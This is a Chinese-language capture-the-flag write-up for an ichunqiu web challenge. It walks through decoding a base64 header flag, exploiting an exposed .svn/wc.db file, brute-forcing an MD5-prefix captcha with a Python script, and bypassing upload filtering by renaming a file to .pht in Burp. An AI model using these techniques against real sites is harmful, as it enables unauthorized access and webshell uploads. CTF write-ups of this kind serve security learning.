访问赛题 URL, 返回包如下
HTTP/1.1 200 OK
Server: nginx/1.10.2
Date: Thu, 28 Dec 2017 08:19:49 GMT
Content-Type: text/html
Content-Length: 87
Connection: keep-alive
X-Powered-By: PHP/5.5.9-1ubuntu4.19
Set-Cookie: PHPSESSID=uftmhmic9cts56dopv6vf7pjt1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
flag: ZmxhZ19pc19oZXJlOiBNakkxTXpnMw==
Vary: Accept-Encoding
Hi,CTFer!u should be a fast man:)<!-- Please post the ichunqiu what you find -->
base64解密flag,在解密作为返回,Python代码如下:
import base64,requests a = requests.session() b = a.get("http://17d0e7ece2b246f993d2aee4ba32ea60ce0e9f6a78714602.game.ichunqiu.com/") key1 = b.headers["flag"] c = base64.b64decode(key1) d = str(c).split(':') key = base64.b64decode(d[1]) body = {"ichunqiu":key} f = a.post("http://17d0e7ece2b246f993d2aee4ba32ea60ce0e9f6a78714602.game.ichunqiu.com/",data=body) print f.text
结果:Path:3712901a08bb58557943ca31f3487b7d
http://17d0e7ece2b246f993d2aee4ba32ea60ce0e9f6a78714602.game.ichunqiu.com/3712901a08bb58557943ca31f3487b7d
点击跳转到: action.php?action=login 登录页面
访问 URL+/xxxx/.svn/wc.db (SVN 源码泄露漏洞)
可获得提示 username is md5(HEL1OW10rDEvery0n3)
观察登录页面得知 captcha 经过 MD5 之后的前六位为 xxxxxx, 所以需要先求得对应的 captcha 才能提交.
写爆破验证码的脚本
import hashlib
def md5(s):
return hashlib.md5(str(s).encode('utf-8')).hexdigest()
def main(s):
for i in range(1,99999999):
if md5(i)[0:6] == str(s):
print(i)
exit(0)
if __name__ == '__main__':
main("xxxx")
用户名: 8638d5263ab0d3face193725c23ce095
密码: 123456
验证码: 用爆破脚本跑
The 7815696ecbf1c96e6894b779456d330e.php:)Welcome 8638d5263ab0d3face193725c23ce095!
http://17d0e7ece2b246f993d2aee4ba32ea60ce0e9f6a78714602.game.ichunqiu.com/3712901a08bb58557943ca31f3487b7d/7815696ecbf1c96e6894b779456d330e.php
上传jpg,burp拦截改为pht格式,得到flag
flag{0959114c-4de1-4413-959c-22e0c7885c60}